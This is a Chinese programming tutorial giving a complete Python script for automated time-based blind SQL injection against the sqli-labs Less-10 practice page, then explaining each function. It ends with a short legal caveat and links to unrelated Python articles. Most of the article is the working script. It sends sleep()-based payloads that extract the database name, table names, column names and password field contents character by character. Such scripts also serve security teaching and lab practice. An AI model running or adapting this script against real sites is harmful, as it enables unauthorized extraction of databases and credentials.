python實現(xiàn)自動化的sql延時注入

更新時間：2024年12月12日 09:49:49 作者：樂茵安全

這篇文章主要為大家詳細介紹了如何基于python實現(xiàn)自動化的sql延時注入腳本,文中的示例代碼講解詳細,感興趣的小伙伴可以跟隨小編一起學習一下

自動化的sql延時注入腳本

源碼

import requests
import time
import datetime
url = "http://www.sr.com:8082/sqli-labs-master/Less-10/"
p1 = 'abcdefghijklmnopqrstuvwxyz0123456789'
#獲取數(shù)據(jù)庫長度
def database_len():
    for i in range(1,10):
        payload = '?id=1" and if(length(database())>%s,sleep(4),0)--+'%i
        url1 = url +payload
        #print(url1)
        time1 =datetime.datetime.now()
        r=requests.get(url=url1)
        time2=datetime.datetime.now()
        time3 = (time2-time1).total_seconds()    #計算時間差， 忽略天 只看時分秒   total_seconds() 真正的時間差 包含天
        if time3 >= 4:
            print(i)
        else:
            print(i)
            break
    print('數(shù)據(jù)庫長度為:',i)
 
#database_len()
 
 
#獲取數(shù)據(jù)庫名
def datebase_name():
    name=''
    for i in range(1,9):
        for j in p1:
            payload='?id=1" and if(substr(database(),%s,1)="%s",sleep(4),1)--+' %(i,j)
            url1=url+payload
            #print(url1)
            time1=datetime.datetime.now()
            r=requests.get(url=url1)
            time2=datetime.datetime.now()
            time3=(time2-time1).total_seconds()
            if time3 >= 4:
                name += j
                print(name)
                break
    n = name
    print('數(shù)據(jù)庫名字為:'+n)
 
#datebase_name()
 
#獲取表
def tables_name():
    global table4
    table1=''
    table2=''
    table3=''
    table4=''
    for i in range(5):
        for j in range(1,6):
            for t in p1:
                payload='?id=1" and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)="%s"),3,0)) --+'%(i,j,t)
                url1=url+payload
                #print(url1)
                time1=datetime.datetime.now()
                r=requests.get(url=url1)
                time2=datetime.datetime.now()
                time3=(time2-time1).seconds
                if time3 >= 3:
                    if i == 0:
                        table1 +=t
                        print('第一個表為:',table1)
                    elif i == 1:
                        table2 += t
                        print('第二個表為：',table2)
                    elif i == 2:
                        table3 +=t
                        print('第三個表為：',table3)
                    elif i == 3:
                        table4 += t
                        print('第四個表為：',table4)
                    else:
                        break
    print('第一個表為'+table1)
    print('第二個表為'+table2)
    print('第三個表為' + table3)
    print('第四個表為' + table4)
 
 
#tables_name()
 
#獲取表中的字段
def table_column():
    global column3
    column1=''
    column2=''
    column3=''
    f=table4
    for i in range(3):
        for j in range(1,9):
            for t in p1:
                payload='?id=1" and sleep(if((mid((select column_name from information_schema.columns where table_name=\'%s\' limit %s,1),%s,1)="%s"),5,0)) --+'%(f,i,j,t)
                url1 =url+payload
                #print(url1)
                time1 = datetime.datetime.now()
                r = requests.get(url=url1)
                time2 = datetime.datetime.now()
                time3 = (time2 - time1).seconds
                if time3 >= 5:
                    if i == 0:
                        column1 += t
                        print('字段一為：'+column1)
                    elif i == 1:
                        column2 += t
                        print('字段二為：'+column2)
                    elif i == 2:
                        column3 += t
                        print('字段三為:'+column3)
                    else:
                        break
    print('users字段一為：'+column1)
    print('字段二為：'+column2)
    print('字段三為：',column3)
 
 
#table_column()
 
def s_content():
    content1=''
    f1= column3
    f2= table4
    for i in range(20):
            for t in p1:
                payload = '?id=1" and sleep(if((mid((select %s from %s limit 7,1),%s,1)="%s" ),3,0)) --+'%(f1,f2,i,t)
                url1 =url+payload
                #print(url1)
                time1=datetime.datetime.now()
                r = requests.get(url=url1)
                time2 = datetime.datetime.now()
                time3 = (time2-time1).seconds
                if time3 >=3:
                        content1 += t
                        print('password字段一內容為：'+content1)
                        break
 
    print('字段內容為：'+content1)
 
 
start_time=time.time()
database_len()
datebase_name()
tables_name()
table_column()
s_content()
end_time=time.time()
end_start_time=end_time-start_time
print('總花費時間為',end_start_time,'秒')”

源碼詳解

這段代碼是一個Python腳本，用于通過SQL注入漏洞來探測和提取一個Web應用程序的數(shù)據(jù)庫信息。它使用了requests庫來發(fā)送HTTP請求，并使用time和datetime庫來測量響應時間，從而推斷出數(shù)據(jù)庫的結構和內容。

導入庫

import requests
import time
import datetime

requests: 用于發(fā)送HTTP請求。

time 和 datetime: 用于測量時間差。

定義URL

url = "http://www.sr.com:8082/sqli-labs-master/Less-10/"

目標URL，用于發(fā)送SQL注入請求。

定義字符集

p1 = 'abcdefghijklmnopqrstuvwxyz0123456789'

包含所有可能的字符，用于構造SQL注入的payload。

獲取數(shù)據(jù)庫長度

def database_len():
    # ...

通過逐步增加length(database())的值，并測量響應時間來確定數(shù)據(jù)庫名稱的長度。

獲取數(shù)據(jù)庫名

def datebase_name():
    # ...

通過逐個字符地探測數(shù)據(jù)庫名稱，并測量響應時間來確定每個字符。

獲取表名

def tables_name():
    # ...

通過查詢information_schema.tables表，并測量響應時間來確定表名。

獲取表中的字段

def table_column():
    # ...

通過查詢information_schema.columns表，并測量響應時間來確定字段名。

獲取字段內容

def s_content():
    # ...

通過查詢特定表的特定字段，并測量響應時間來確定字段的內容。

主程序

start_time = time.time()
database_len()
datebase_name()
tables_name()
table_column()
s_content()
end_time = time.time()
end_start_time = end_time - start_time
print('總花費時間為', end_start_time, '秒')

記錄開始時間，依次調用上述函數(shù)來獲取數(shù)據(jù)庫信息，記錄結束時間，并計算總耗時。

注意事項

SQL注入風險: 這段代碼利用了SQL注入漏洞，實際應用中應避免這種不安全的做法。

法律和道德: 在未經授權的情況下進行此類操作是違法的，應確保在合法和授權的環(huán)境中使用。

代碼注釋: 代碼中有大量被注釋掉的print語句，這些語句可以幫助調試和理解代碼的執(zhí)行過程。

總結

這段代碼通過構造特定的SQL注入payload，并利用時間延遲來逐步揭示數(shù)據(jù)庫的結構和內容。雖然這種方法在安全研究中有一定的價值，但在實際應用中應嚴格遵守法律法規(guī)和道德準則。

到此這篇關于python實現(xiàn)自動化的sql延時注入的文章就介紹到這了,更多相關python sql延時注入內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家！

您可能感興趣的文章:

python
sql

Python包中__init__.py文件的作用與用法實例詳解
我們新建python包時常常會看到一個__init _.py文件,下面這篇文章主要給大家介紹了關于Python包中__init__.py文件的作用與用法的相關資料,文中通過實例代碼介紹的非常詳細,需要的朋友可以參考下
2022-06-06
Python決策樹分類算法學習
這篇文章主要為大家詳細介紹了Python決策樹分類算法，具有一定的參考價值，感興趣的小伙伴們可以參考一下
2017-12-12
基于Python中Remove函數(shù)的用法討論
這篇文章主要介紹了基于Python中Remove函數(shù)的用法討論，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2020-12-12
利用Vscode進行Python開發(fā)環(huán)境配置的步驟
這篇文章主要給大家介紹了關于如何利用Vscode進行Python開發(fā)環(huán)境配置的相關資料，文中通過示例代碼介紹的非常詳細，對大家學習或者使用Python具有一定的參考學習價值，需要的朋友們下面來一起學習學習吧
2020-06-06
python反轉(逆序)字符串的6種方法詳細
這篇文章主要介紹了python反轉(逆序)字符串的6種方法詳細,需要的朋友可以參考下
2021-04-04
python如何實現(xiàn)向上取整
這篇文章主要介紹了python如何實現(xiàn)向上取整問題，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2023-01-01
基于Python實現(xiàn)搶注大詞的提詞工具
這篇文章主要為大家詳細介紹了如何利用Python語言實現(xiàn)搶注大詞的提詞工具，文中的示例代碼講解詳細，感興趣的小伙伴可以跟隨小編一起學習一下
2023-02-02
Django csrf校驗的實現(xiàn)
這篇文章主要介紹了Django csrf校驗的實現(xiàn)，文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值，需要的朋友們下面隨著小編來一起學習學習吧
2021-05-05
python創(chuàng)建文件備份的腳本
這篇文章主要介紹了python創(chuàng)建文件備份的腳本,非常不錯，具有一定的參考借鑒價值，需要的朋友可以參考下
2018-09-09
簡單介紹django提供的加密算法
在本篇文章里小編給大家分享的是關于django提供的加密算法的相關知識點，有需要的朋友們學習下。
2019-12-12